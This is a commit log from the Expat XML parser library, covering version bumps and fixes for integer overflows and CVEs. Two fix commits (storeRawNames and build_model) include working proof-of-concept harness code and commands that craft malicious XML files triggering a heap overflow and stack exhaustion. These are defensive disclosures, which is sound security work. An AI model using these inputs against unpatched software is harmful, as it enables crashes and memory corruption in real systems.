Commit graph

902 commits

Author SHA1 Message Date
Samanta Navarro
eb0362808b Prevent integer overflow in storeRawNames
It is possible to use an integer overflow in storeRawNames for out of
boundary heap writes. Default configuration is affected. If compiled
with XML_UNICODE then the attack does not work. Compiling with
-fsanitize=address confirms the following proof of concept.

The problem can be exploited by abusing the m_buffer expansion logic.
Even though the initial size of m_buffer is a power of two, eventually
it can end up a little bit lower, thus allowing allocations very close
to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
names can be parsed which are almost INT_MAX in size.

Unfortunately (from an attacker point of view) INT_MAX/2 is also a
limitation in string pools. Having a tag name of INT_MAX/2 characters
or more is not possible.

Expat can convert between different encodings. UTF-16 documents which
contain only ASCII representable characters are twice as large as their
ASCII encoded counter-parts.

The proof of concept works by taking these three considerations into
account:

1. Move the m_buffer size slightly below a power of two by having a
   short root node <a>. This allows the m_buffer to grow very close
   to INT_MAX.
2. The string pooling forbids tag names longer than or equal to
   INT_MAX/2, so keep the attack tag name smaller than that.
3. To be able to still overflow INT_MAX even though the name is
   limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
   which only contains ASCII characters. UTF-16 always stores two
   bytes per character while the tag name is converted to using only
   one. Our attack node byte count must be a bit higher than
   2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
   in sum can overflow INT_MAX.

Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
without running into INT_MAX boundary check. The string pooling is
able to store INT_MAX/3 as tag name because the amount is below
INT_MAX/2 limitation. And creating the sum of both eventually overflows
in storeRawNames.

Proof of Concept:

1. Compile expat with -fsanitize=address.

2. Create Proof of Concept binary which iterates through input
   file 16 MB at once for better performance and easier integer
   calculations:

```
cat > poc.c << EOF
 #include <err.h>
 #include <expat.h>
 #include <stdlib.h>
 #include <stdio.h>

 #define CHUNK (16 * 1024 * 1024)
 int main(int argc, char *argv[]) {
   XML_Parser parser;
   FILE *fp;
   char *buf;
   int i;

   if (argc != 2)
     errx(1, "usage: poc file.xml");
   if ((parser = XML_ParserCreate(NULL)) == NULL)
     errx(1, "failed to create expat parser");
   if ((fp = fopen(argv[1], "r")) == NULL) {
     XML_ParserFree(parser);
     err(1, "failed to open file");
   }
   if ((buf = malloc(CHUNK)) == NULL) {
     fclose(fp);
     XML_ParserFree(parser);
     err(1, "failed to allocate buffer");
   }
   i = 0;
   while (fread(buf, CHUNK, 1, fp) == 1) {
     printf("iteration %d: XML_Parse returns %d\n", ++i,
       XML_Parse(parser, buf, CHUNK, XML_FALSE));
   }
   free(buf);
   fclose(fp);
   XML_ParserFree(parser);
   return 0;
 }
EOF
gcc -fsanitize=address -lexpat -o poc poc.c
```

3. Construct specially prepared UTF-16 XML file:

```
dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
```

4. Run proof of concept:

```
./poc poc-utf16.xml
```
2022-02-15 12:17:18 +00:00
Samanta Navarro
efcb347440 Prevent integer overflow in copyString
The copyString function is only used for encoding string supplied by
the library user.
2022-02-15 12:16:57 +00:00
Samanta Navarro
9b4ce651b2 Prevent stack exhaustion in build_model
It is possible to trigger stack exhaustion in build_model function if
depth of nested children in DTD element is large enough. This happens
because build_node is a recursively called function within build_model.

The code has been adjusted to run iteratively. It uses the already
allocated heap space as temporary stack (growing from top to bottom).

Output is identical to recursive version. No new fields in data
structures were added, i.e. it keeps full API and ABI compatibility.
Instead the numchildren variable is used to temporarily keep the
index of items (uint vs int).

Documentation and readability improvements kindly added by Sebastian.

Proof of Concept:

1. Compile poc binary which parses XML file line by line

```
cat > poc.c << EOF
 #include <err.h>
 #include <expat.h>
 #include <stdio.h>

 XML_Parser parser;

 static void XMLCALL
 dummy_element_decl_handler(void *userData, const XML_Char *name,
                            XML_Content *model) {
   XML_FreeContentModel(parser, model);
 }

 int main(int argc, char *argv[]) {
   FILE *fp;
   char *p = NULL;
   size_t s = 0;
   ssize_t l;
   if (argc != 2)
     errx(1, "usage: poc poc.xml");
   if ((parser = XML_ParserCreate(NULL)) == NULL)
     errx(1, "XML_ParserCreate");
   XML_SetElementDeclHandler(parser, dummy_element_decl_handler);
   if ((fp = fopen(argv[1], "r")) == NULL)
     err(1, "fopen");
   while ((l = getline(&p, &s, fp)) > 0)
     if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK)
       errx(1, "XML_Parse");
   XML_ParserFree(parser);
   free(p);
   fclose(fp);
   return 0;
 }
EOF
cc -std=c11 -D_POSIX_C_SOURCE=200809L -lexpat -o poc poc.c
```

2. Create XML file with a lot of nested groups in DTD element

```
cat > poc.xml.zst.b64 << EOF
KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA
ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC
ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ==
EOF
base64 -d poc.xml.zst.b64 | zstd -d > poc.xml
```

3. Run Proof of Concept

```
./poc poc.xml
```

Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
2022-02-15 12:16:23 +00:00
Sebastian Pipping
039af6611d Sync file headers 2022-01-29 23:28:05 +01:00
Sebastian Pipping
a445be8e0d Bump version to 2.4.4 2022-01-29 23:20:49 +01:00
czentgr
d97a123d0b
Stop casting void* results from calls to .malloc_fcn (#553) 2022-01-29 01:21:41 +01:00
Sebastian Pipping
ede41d1e18 lib: Prevent integer overflow in doProlog (CVE-2022-23990)
The change from "int nameLen" to "size_t nameLen"
addresses the overflow on "nameLen++" in code
"for (; name[nameLen++];)" right above the second
change in the patch.
2022-01-26 19:33:12 +01:00
Samanta Navarro
847a645152 lib: Detect and prevent integer overflow in XML_GetBuffer (CVE-2022-23852) 2022-01-24 02:35:02 +01:00
Samanta Navarro
5a8f5f1d40 Fix typos
Typos found with codespell.
2022-01-22 12:06:45 +00:00
Sebastian Pipping
6496a03d40 Sync years in file headers 2022-01-13 23:45:22 +01:00
Sebastian Pipping
d102671bfe Bump version to 2.4.3 2022-01-13 20:08:47 +01:00
Sebastian Pipping
9f93e8036e lib: Prevent integer overflow at multiple places (CVE-2022-22822 to CVE-2022-22827)
The involved functions are:
- addBinding (CVE-2022-22822)
- build_model (CVE-2022-22823)
- defineAttribute (CVE-2022-22824)
- lookup (CVE-2022-22825)
- nextScaffoldPart (CVE-2022-22826)
- storeAtts (CVE-2022-22827)
2022-01-12 17:01:55 +01:00
Sebastian Pipping
85ae9a2d7d lib: Prevent integer overflow on m_groupSize in function doProlog (CVE-2021-46143) 2022-01-10 16:51:14 +01:00
Sebastian Pipping
0adcb34c49 lib: Detect and prevent troublesome left shifts in function storeAtts (CVE-2021-45960) 2022-01-05 18:23:42 +01:00
Sebastian Pipping
5bab452b49 lib: Address GCC 11.2.1 compiler warning
Symptom was:

In file included from xmltok.c:58:
xmltok_ns.c: In function ‘findEncodingNS’:
xmltok.h:276:10: warning: ‘buf’ may be used uninitialized [-Wmaybe-uninitialized]
  276 |   (((enc)->utf8Convert)(enc, fromP, fromLim, toP, toLim))
      |   ~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
xmltok_ns.c:99:3: note: in expansion of macro ‘XmlUtf8Convert’
   99 |   XmlUtf8Convert(enc, &ptr, end, &p, p + ENCODING_MAX - 1);
      |   ^~~~~~~~~~~~~~
xmltok.h:276:10: note: by argument 5 of type ‘const char *’ to ‘enum XML_Convert_Result(const ENCODING *, const char **, const char *, char **, const char *)’ {aka ‘enum XML_Convert_Result(const struct encoding *, const char **, const char *, char **, const char *)’}
  276 |   (((enc)->utf8Convert)(enc, fromP, fromLim, toP, toLim))
      |   ~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
xmltok_ns.c:99:3: note: in expansion of macro ‘XmlUtf8Convert’
   99 |   XmlUtf8Convert(enc, &ptr, end, &p, p + ENCODING_MAX - 1);
      |   ^~~~~~~~~~~~~~
In file included from xmltok.c:1666:
xmltok_ns.c:96:8: note: ‘buf’ declared here
   96 |   char buf[ENCODING_MAX];
      |        ^~~
2021-12-25 18:15:25 +01:00
Sebastian Pipping
f3f6ae617c Bump version to 2.4.2 2021-12-17 18:01:39 +01:00
Sebastian Pipping
c05efa1fbf Apply #514 to attribution headers 2021-10-17 16:28:01 +02:00
Dong-hee Na
59734d6e31 Reorder the location of including expat_config.h 2021-10-17 20:45:24 +09:00
Sebastian Pipping
0b7a88b355 Autotools|CMake: Link against libm for function "isnan"
$ git --no-pager grep -lw isnan
lib/xmlparse.c
tests/runtests.c
xmlwf/xmlwf.c
2021-09-20 18:27:52 +02:00
Sebastian Pipping
8001550dc4 Bump version to 2.4.1 2021-05-23 16:52:59 +02:00
Sebastian Pipping
b913a529ae Bump version to 2.4.0 2021-05-22 19:07:49 +02:00
Sebastian Pipping
60959f2b49 lib: Fix accounting of CDATA sections inside of general entities 2021-05-14 20:46:09 +02:00
Sebastian Pipping
5dbc857f47 tests: Cover helper unsignedCharToPrintable 2021-05-07 18:25:08 +02:00
Sebastian Pipping
271efb6069 tests: Cover accounting 2021-05-07 18:25:07 +02:00
Sebastian Pipping
29c3748788 lib: Make EXPAT_ENTROPY_DEBUG consistent with other EXPAT_*_DEBUG variables 2021-05-07 18:25:07 +02:00
Sebastian Pipping
857fdc4c3b lib: Add prefix "expat: " to EXPAT_ENTROPY_DEBUG=1 stderr output 2021-05-07 18:25:07 +02:00
Sebastian Pipping
8af7d22ff0 lib: Allow test suite to access raw accounting values 2021-05-07 18:25:07 +02:00
Sebastian Pipping
fcd0e14c3e lib: Address Cppcheck 2.4.1 warning "uninitvar" 2021-05-07 18:25:07 +02:00
Sebastian Pipping
b1d039607d lib: Protect against billion laughs attacks (approach 3.0.21) 2021-05-07 18:25:07 +02:00
Sebastian Pipping
df42f935bf Increase precision in existing MIT headers based on Git history 2021-05-02 19:53:29 +02:00
Sebastian Pipping
ed36812db2 lib: Fix macro IS_INVALID_CHAR (for UTF-16 with macro XML_MIN_SIZE defined)
What happens is that with macro XML_MIN_SIZE defined,
for UTF-16 macro IS_INVALID_CHAR was being set to ..

> #define IS_INVALID_CHAR(enc, p, n)  (AS_NORMAL_ENCODING(enc)->isInvalid##n(enc, p))

.. which calls NULL pointers in .isInvalid{2,3,4} at runtime.

For UTF-16 we actually need what xmltok_impl.c does for macro
IS_INVALID_CHAR when it has not yet been defined:

> #  ifndef IS_INVALID_CHAR
> #    define IS_INVALID_CHAR(enc, ptr, n) (0)
> #  endif

So the fix is a combination of these two:
- Use .isInvalid{2,3,4} where needed and available and
- return 0/false for UTF-16 where .isInvalid{2,3,4} are NULL.
2021-04-26 14:18:00 +02:00
Sebastian Pipping
3b1b81f028 lib: Add comments about effect of XML_MIN_SIZE to xmltok_impl.c 2021-04-26 14:18:00 +02:00
Sebastian Pipping
8d1bd6ff2c Resolve macro HAVE_EXPAT_CONFIG_H 2021-04-22 00:11:28 +02:00
Sebastian Pipping
f29b48cfca Unexpose function _INTERNAL_trim_to_complete_utf8_characters (#457) 2021-04-05 21:44:15 +02:00
Sebastian Pipping
f01a61402c Autotools: Give test suite access to internal symbols 2021-04-05 20:05:50 +02:00
Sebastian Pipping
800c4d14e2 lib: Fix references to version 2.2.11 to be about 2.3.0, instead 2021-03-24 21:05:04 +01:00
Sebastian Pipping
3417b3e098 Bump version from 2.2.10 to 2.3.0 2021-03-24 21:05:04 +01:00
Sebastian Pipping
87176c5ce3 expat.h: Fix conmment typo regarding XML_ERROR_UNKNOWN_ENCODING 2021-03-17 02:12:18 +01:00
Sebastian Pipping
811c41e3be xmlparse.c: Reject missing call to XML_GetBuffer in XML_ParseBuffer
.. rather than running into undefined behavior.
2021-02-24 02:26:06 +01:00
Sebastian Pipping
ea60ef34a7 Drop remaining support for Visual Studio 2008, 2010, 2012 (#422) 2020-10-03 21:30:13 +02:00
Sebastian Pipping
3af8f46e3f Bump version from 2.2.9 to 2.2.10 2020-10-03 00:49:33 +02:00
Boris Kolpackov
81ae3e7208 Get rid of unsigned integer overflow in column calculation
While unsigned integer overflow is well-defined, Android sanitizers treat it
as an error. We also have some in the SipHash implementation but those won't
be easy to get rid of.
2020-08-17 16:08:56 +02:00
Sebastian Pipping
fc0e2365c9 Be more correct about const correctness on the inside 2020-07-16 21:09:00 +02:00
Sebastian Pipping
13bb381d29 xmlparse.c: Fix reading uninitialized variable (#404) 2020-05-28 01:57:06 +02:00
Ben Wagner
49c165c5a8 Don't add to NULL in iterator.
In C it is undefined to add anything to NULL. Clang recently began
taking advantage of this and can assume that if anything is added or
subtracted from a pointer that the pointer can be assumed non-NULL. The
Address Sanitizer has been updated to report when this happens at
runtime and produces messages like

expat/lib/xmlparse.c:6509:23: runtime error: applying zero offset to null pointer
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior expat/lib/xmlparse.c:6509:23

This can be mitigated with 'p ? p + n : NULL' which optimizes to just
the add in all optimizing compilers, but avoids the undefined behavior.
2020-04-07 13:12:18 -04:00
Sebastian Pipping
ef09dbabd4 xmlparse.c: Fix undefined behavior for XML_UNICODE
Pointer arithmetic with NULL is undefined behavior.
This reverts c71f27573b
2020-03-20 05:31:40 +01:00
Sebastian Pipping
2db13ca57d xmlwf: Add missing @AM_*FLAGS@ 2020-03-18 00:32:06 +01:00
luz.paz
56893d4fbb Fix source comment typos
Found via `codespell -q 3 -S ./testdata,./expat/Changes`
2019-11-04 07:52:31 -05:00
Sebastian Pipping
515f5d07c6 xmlparse.c: Improve warning regarding lack of high quality entropy (#172) 2019-10-26 15:23:09 +02:00
Sebastian Pipping
fc32dd491c xmlparse.c: Limit declaration of rand_s to mingwrt <5.3.0 2019-10-13 13:06:05 +02:00